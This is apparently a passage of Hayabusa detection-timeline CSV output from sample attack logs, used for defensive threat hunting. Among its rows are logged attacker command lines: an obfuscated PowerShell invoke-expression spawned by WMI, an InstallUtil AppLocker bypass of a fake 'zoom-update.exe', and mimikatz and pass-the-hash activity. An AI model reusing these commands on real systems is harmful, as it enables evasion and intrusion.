87,105,110,100,111,119,115,32,73,80,32,67,111,110,102,105,103,117,114,97,116,105,111,110,13,10,13,10,32,32,32,72,111,115,116,32,78,97,109,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,102,115,48,51,118,117,108,110,13,10,32,32,32,80,114,105,109,97,114,121,32,68,110,115,32,83,117,102,102,105,120,32,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,32,32,32,78,111,100,101,32,84,121,112,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,72,121,98,114,105,100,13,10,32,32,32,73,80,32,82,111,117,116,105,110,103,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,87,73,78,83,32,80,114,111,120,121,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,68,78,83,32,83,117,102,102,105,120,32,83,101,97,114,99,104,32,76,105,115,116,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,13,10,69,116,104,101,114,110,101,116,32,97,100,97,112,116,101,114,32,69,116,104,101,114,110,101,116,48,58,13,10,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,73,110,116,101,108,40,82,41,32,56,50,53,55,52,76,32,71,105,103,97,98,105,116,32,78,101,116,119,111,114,107,32,67,111,110,110,101,99,116,105,111,110,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115,13,10,32,32,32,76,105,110,107,45,108,111,99,97,108,32,73,80,118,54,32,65,100,100,114,101,115,115,32,46,32,46,32,46,32,46,32,46,32,58,32,102,101,56,48,58,58,99,48,98,100,58,54,57,54,99,58,51,57,54,48,58,97,49,98,49,37,49,50,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,73,80,118,52,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,51,56,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,83,117,98,110,101,116,32,77,97,115,107,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,50,53,53,46,50,53,53,46,50,53,53,46,48,13,10,32,32,32,68,101,102,97,117,108,116,32,71,97,116,101,119,97,121,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,13,10,32,32,32,68,72,67,80,118,54,32,73,65,73,68,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,51,48,50,48,49,48,52,53,52,13,10,32,32,32,68,72,67,80,118,54,32,67,108,105,101,110,116,32,68,85,73,68,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,49,45,48,48,45,48,49,45,50,54,45,52,54,45,50,56,45,65,68,45,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,78,83,32,83,101,114,118,101,114,115,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,48,13,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,49,48,46,50,51,46,52,50,46,49,49,13,10,32,32,32,78,101,116,66,73,79,83,32,111,118,101,114,32,84,99,112,105,112,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,69,110,97,98,108,101,100,13,10,13,10,84,117,110,110,101,108,32,97,100,97,112,116,101,114,32,105,115,97,116,97,112,46,123,68,54,56,57,48,67,54,52,45,54,67,56,55,45,52,48,54,65,45,65,69,66,56,45,69,51,51,70,53,52,69,53,66,67,56,50,125,58,13,10,13,10,32,32,32,77,101,100,105,97,32,83,116,97,116,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,101,100,105,97,32,100,105,115,99,111,110,110,101,99,116,101,100,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,105,99,114,111,115,111,102,116,32,73,83,65,84,65,80,32,65,100,97,112,116,101,114,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,69,48,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115 | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.139 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: %%SystemRoot%%\MEMORY.DMP | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_sysmon/registry_event/registry_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_sysmon/registry_event/registry_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 15:01:27.604 +00:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x35d1aad | PID: 1860 | PGUID: A57649D1-3BC7-6189-091B-5D0300000000 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-08 15:01:27.604 +00:00,fs03vuln.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-08 15:01:27.604 +00:00,fs03vuln.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-08 15:01:27.604 +00:00,fs03vuln.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-08 15:01:27.604 +00:00,fs03vuln.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-13 14:08:43.058 +00:00,FS03.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx +2021-11-13 14:08:43.058 +00:00,FS03.offsec.lan,4688,medium,LatMov,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation_builtin/proc_creation_win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx +2021-11-13 14:08:43.058 +00:00,FS03.offsec.lan,4688,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_builtin/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx +2021-11-13 14:08:45.929 +00:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: - | Process: | Target Server: cifs/fs03vuln.offsec.lan,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx +2021-11-13 14:30:53.638 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 14:30:58.226 +00:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: ::1 | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 14:30:58.226 +00:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fa4 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 14:30:58.226 +00:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fc2 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 14:30:58.226 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0xa6f5fa4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-18 07:40:29.566 +00:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00 | Hash: SHA1=22A72E39D307BC628093B043EF058DB1310BBF4B,MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:29.774 +00:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\CSCFD9BAF75EA53488BBE2F1273837CC796.TMP | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:29.795 +00:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:29.795 +00:00,PC-01.cybercat.local,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:29.795 +00:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CVTRES.EXE-BBD3ED93.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:29.809 +00:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CSC.EXE-B6D5E435.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:30.866 +00:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\svchost.exe | PID: 748 | PGUID: 510C1E8A-EF18-6195-0F00-000000000F00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:35.935 +00:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\DllHost.exe | PID: 2348 | PGUID: 510C1E8A-036E-6196-6A01-000000000F00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:46.157 +00:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:40:46.404 +00:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 07:42:34.415 +00:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:42:34.416 +00:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:42:54.822 +00:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1218.004,technique_name=InstallUtil | Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 816 | PGUID: 510C1E8A-03FE-6196-7101-000000000F00 | Hash: SHA1=25F66231385528D9F0E14546E2132AC486CB6955,MD5=964D5013C1EC42371AD135E02221A704,SHA256=19C86A9315EECCBB480BA6C48711EE24EA24EE97E27C1E1EEAC8B63D01A71D9F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:42:54.822 +00:00,PC-01.cybercat.local,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:42:54.822 +00:00,PC-01.cybercat.local,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:43:04.979 +00:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\INSTALLUTIL.EXE-9953E407.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:43:22.487 +00:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 07:43:22.705 +00:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-23 09:26:30.059 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157add,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.121 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157afc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.121 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 